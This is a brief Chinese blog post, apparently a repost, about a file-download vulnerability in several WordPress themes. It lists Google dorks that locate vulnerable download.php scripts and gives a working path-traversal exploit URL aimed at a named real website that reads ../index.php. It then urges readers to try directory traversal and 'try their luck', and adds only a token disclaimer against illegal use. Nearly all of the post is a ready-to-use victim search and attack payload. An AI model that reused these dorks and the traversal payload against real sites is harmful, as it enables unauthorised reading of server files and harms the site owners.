WordPress 文件下载漏洞

Google dork:inurl:"/wp-content/themes/liberator/inc/php/download.php"

exploit:https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php

google dork: 

inurl:"/wp-content/themes/newspro2891/download.php"

inurl:"/wp-content/themes/cafesalivation/download.php"

inurl:"/wp-content/themes/duena/download.php"

可以尝试跨目录访问,碰下运气,稳一波

扫描二维码关注公众号,回复: 6939052 查看本文章

各位可以自行测试,请勿非法使用!!

猜你喜欢

转载自www.cnblogs.com/hack404/p/11294453.html